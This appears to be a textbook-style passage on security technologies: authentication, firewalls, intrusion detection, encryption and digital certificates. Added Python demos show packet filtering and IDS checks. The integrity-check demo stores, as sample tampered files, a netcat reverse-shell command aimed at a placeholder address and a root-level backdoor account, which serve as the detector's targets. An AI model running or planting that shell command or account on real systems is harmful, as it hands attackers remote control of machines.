Which feature of cryptography is used to prove a user's identity and prevent an individual?


Technologies and Tools for Security and Control

Various tools and technologies used to help protect against or monitor intrusion include authentication tools, firewalls, intrusion detection systems, and antivirus and encryption software.

Access control consists of all the policies and procedures a company uses to prevent improper access to systems by unauthorized insiders and outsiders. Authentication refers to the ability to know that a person is who he or she claims to be. Access control software is designed to allow only authorized persons to use systems or to access data using some method for authentication. New authentication technologies include:

  • Token: A physical device, similar to an identification card, that is designed to prove the identity of a single user; it typically displays a passcode that changes at short intervals.
  • Smart card: A device about the size of a credit card that contains a chip formatted with access permissions and other data.
  • Biometric authentication: Compares a person's unique physical characteristics, such as fingerprints, face, or retinal image, against a stored profile.

A firewall is a combination of hardware and software that controls the flow of incoming and outgoing network traffic and prevents unauthorized communication into and out of the network. The firewall identifies names, Internet Protocol (IP) addresses, applications, and other characteristics of incoming traffic. It checks this information against the access rules programmed into the system by the network administrator. There are a number of firewall screening technologies:

  • Packet filtering examines fields in the headers of data packets flowing between the network and the Internet, examining individual packets in isolation.
  • Stateful inspection determines whether packets are part of an ongoing dialogue between a sender and a receiver.
  • Network Address Translation (NAT) rewrites the source addresses of outgoing packets so that the IP addresses of the organization's internal hosts are never exposed to, or directly reachable from, hosts and sniffer programs outside the firewall.
  • Application proxy filtering examines the application content of packets. A proxy server stops data packets originating outside the organization, inspects them, and passes a proxy to the other side of the firewall. If a user outside the company wants to communicate with a user inside the organization, the outside user first "talks" to the proxy application and the proxy application communicates with the firm's internal computer.
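The difference between the first two screening technologies is easiest to see in code. The following is an added example, not from the original text: a stateless packet filter judges each packet in isolation by its header fields, while the stateful firewall keeps a table of connections that inside hosts opened and only admits inbound packets that belong to one of them (or that target a published service). The addresses, ports and rule set are hypothetical.

```python
"""Packet filtering vs. stateful inspection, demonstrated on constructed packets."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    syn: bool       # True on the first packet of a TCP connection
    inbound: bool   # True when the packet arrives from the Internet side


def packet_filter(pkt: Packet) -> str:
    """Stateless packet filtering: decide from header fields only, packet by packet.

    Because it has no memory, the only way to let replies to internal clients
    back in is a broad rule such as 'inbound, high port, not SYN' -- which a
    forged packet can satisfy just as well as a genuine reply.
    """
    if not pkt.inbound:
        return "allow"                        # all outbound traffic permitted
    if pkt.dst_port == 443:
        return "allow"                        # hypothetical public web server
    if pkt.dst_port >= 1024 and not pkt.syn:
        return "allow"                        # assumed to be a reply to an inside client
    return "deny"


class StatefulFirewall:
    """Stateful inspection: inbound packets must belong to a dialogue an inside host started."""

    def __init__(self, public_services=frozenset({443})):
        self.public_services = public_services
        # (internal_ip, internal_port, external_ip, external_port) of flows opened from inside
        self.flows = set()

    def inspect(self, pkt: Packet) -> str:
        if not pkt.inbound:
            self.flows.add((pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return "allow"
        if pkt.dst_port in self.public_services:
            return "allow"
        # A genuine reply mirrors the addresses and ports of an existing outbound flow.
        if (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port) in self.flows:
            return "allow"
        return "deny"


def run_demo() -> dict:
    """Return {packet name: (packet_filter verdict, stateful verdict)} for constructed traffic."""
    fw = StatefulFirewall()
    traffic = [
        # inside client 10.0.0.5 opens a connection to an external web server
        ("outbound", Packet("10.0.0.5", 51000, "203.0.113.10", 80, syn=True, inbound=False)),
        # the server's reply, mirroring that flow
        ("reply", Packet("203.0.113.10", 80, "10.0.0.5", 51000, syn=False, inbound=True)),
        # an attacker forging a 'reply' to a port nobody opened
        ("forged_reply", Packet("198.51.100.7", 80, "10.0.0.5", 51001, syn=False, inbound=True)),
        # a plain inbound probe of SSH
        ("probe", Packet("198.51.100.7", 4444, "10.0.0.5", 22, syn=True, inbound=True)),
    ]
    return {name: (packet_filter(pkt), fw.inspect(pkt)) for name, pkt in traffic}


if __name__ == "__main__":
    for name, verdicts in run_demo().items():
        print(f"{name:13s} stateless={verdicts[0]:5s} stateful={verdicts[1]}")
```

The forged reply is the instructive case: the stateless filter must admit it because it cannot tell it from a legitimate reply, whereas the stateful firewall rejects it because no inside host ever opened that flow.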
Figure 8-6

FIGURE 8-6 A CORPORATE FIREWALL

The firewall is placed between the firm's private network and the public Internet or another distrusted network to protect against unauthorized traffic.

Intrusion detection systems feature full-time monitoring tools placed at the most vulnerable points of corporate networks to detect and deter intruders continually. Scanning software looks for patterns indicative of known attack methods, such as repeated bad-password attempts, checks whether important files have been removed or modified, and sends warnings of vandalism or system administration errors.
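The two checks named above, bad-password patterns and modified or removed files, reduce to small pieces of detection logic. The following is an added example, not from the original text: it flags any source address that produces a burst of failed logins within a short window, and compares file hashes against a baseline to report what changed. The log lines and file contents are constructed for the example, and the threshold and window are assumptions, not recommendations.

```python
"""Two host-IDS style checks over constructed data: failed-login bursts and file integrity."""
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches sshd-style failure lines; other events are ignored.
LOG_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)

# Constructed sample log: one source hammers the host, one legitimate user fumbles twice.
SAMPLE_LOG = """\
Jan 10 10:00:01 gw sshd[201]: Failed password for root from 198.51.100.7 port 4444 ssh2
Jan 10 10:00:02 gw sshd[202]: Failed password for admin from 198.51.100.7 port 4445 ssh2
Jan 10 10:00:03 gw sshd[203]: Failed password for invalid user test from 198.51.100.7 port 4446 ssh2
Jan 10 10:00:04 gw sshd[204]: Failed password for root from 198.51.100.7 port 4447 ssh2
Jan 10 10:00:05 gw sshd[205]: Failed password for root from 198.51.100.7 port 4448 ssh2
Jan 10 10:00:09 gw sshd[206]: Accepted password for alice from 10.0.0.8 port 50001 ssh2
Jan 10 10:03:00 gw sshd[207]: Failed password for alice from 10.0.0.8 port 50002 ssh2
Jan 10 10:07:00 gw sshd[208]: Failed password for alice from 10.0.0.8 port 50003 ssh2
"""


def failed_logins(log_text: str) -> dict:
    """Group timestamps of failed logins by source address."""
    per_source = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")  # syslog lines carry no year
            per_source[m.group(3)].append(ts)
    return per_source


def brute_force_sources(log_text: str, threshold: int = 5,
                        window: timedelta = timedelta(seconds=60)) -> list:
    """Return sources with at least `threshold` failures inside any `window`-long span."""
    alerts = []
    for src, times in failed_logins(log_text).items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                alerts.append(src)
                break
    return alerts


# Constructed file contents standing in for a baseline snapshot and the current state.
BASELINE_FILES = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "/bin/ls": b"\x7fELF...original...",
}
CURRENT_FILES = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\nbackdoor:x:0:0::/:/bin/sh\n",
    "/tmp/.x": b"#!/bin/sh\nnc -e /bin/sh 198.51.100.7 4444\n",
}


def fingerprint(files: dict) -> dict:
    """Map each path to the SHA-256 of its contents."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def integrity_changes(baseline: dict, current: dict) -> dict:
    """Compare two fingerprint maps and report removed, modified and added paths."""
    changes = {}
    for path, digest in baseline.items():
        if path not in current:
            changes[path] = "removed"
        elif current[path] != digest:
            changes[path] = "modified"
    for path in current:
        if path not in baseline:
            changes[path] = "added"
    return changes


if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_LOG))
    print("file changes:", integrity_changes(fingerprint(BASELINE_FILES), fingerprint(CURRENT_FILES)))
```

The baseline of hashes is only as trustworthy as the place it is stored; an intruder who can modify `/etc/passwd` can usually modify a baseline kept on the same disk, so real integrity checkers keep it offline or sign it.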

Antivirus software is designed to check computer systems and drives for the presence of computer viruses. However, to remain effective, the antivirus software must be continually updated.

Vendors of Wi-Fi equipment have adopted stronger security standards. The IEEE 802.11i specification, which the Wi-Fi Alliance industry trade group certifies in products as WPA2, tightens security for wireless LAN products.

Many organizations use encryption to protect sensitive information transmitted over networks. Encryption transforms readable messages into an unintelligible form so that they cannot be read by unauthorized individuals who intercept them.

Two methods for encrypting network traffic on the Web are:

  • Secure Sockets Layer (SSL): SSL and its successor Transport Layer Security (TLS) enable client and server computers to establish a secure connection session and manage encryption and decryption activities.
  • Secure Hypertext Transfer Protocol (S-HTTP) is another protocol designed for encrypting data flowing over the Internet, but it is limited to individual messages and was never widely deployed; in practice, Web traffic is protected with TLS.

Data is encrypted by applying a secret numerical code, called an encryption key, so that the data are transmitted as a scrambled set of characters. To be read, the message must be decrypted (unscrambled) with a matching key. There are two alternative methods of encryption:

  • Symmetric key encryption: The sender and receiver share a single secret key, which must first be distributed to both parties over a channel the attacker cannot read.
  • Public key encryption: Uses two mathematically related keys, one private and one public. It is not inherently stronger than symmetric encryption, but it solves the key-distribution problem, since the public key can be published freely; in practice it is used to exchange a symmetric session key that then encrypts the bulk of the traffic.
Figure 8-7

FIGURE 8-7 PUBLIC KEY ENCRYPTION

A public key encryption system can be viewed as a series of public and private keys that lock data when they are transmitted and unlock the data when they are received. The sender locates the recipient's public key in a directory and uses it to encrypt a message. The message is sent in encrypted form over the Internet or a private network. When the encrypted message arrives, the recipient uses his or her private key to decrypt the data and read the message.

Digital signatures and digital certificates help with authentication. A digital signature is a digital code, computed over a message with the signer's private key and checked with the corresponding public key, that is attached to an electronically transmitted message to verify its origin and that its contents have not been altered. Digital certificates are data files used to establish the identity of users and electronic assets for protection of online transactions. A digital certificate system uses a trusted third party known as a certificate authority (CA) to validate a user's identity and to sign a certificate binding that identity to the user's public key. The digital certificate system would enable, for example, a credit card user and a merchant to validate that their digital certificates were issued by an authorized and trusted third party before they exchange data. Public key infrastructure (PKI), the use of public key cryptography working with a certificate authority, is a principal technology for providing secure authentication of identity online.

Figure 8-8

FIGURE 8-8 DIGITAL CERTIFICATES

Digital certificates help establish the identity of people or electronic assets. They protect online transactions by providing secure, encrypted, online communication.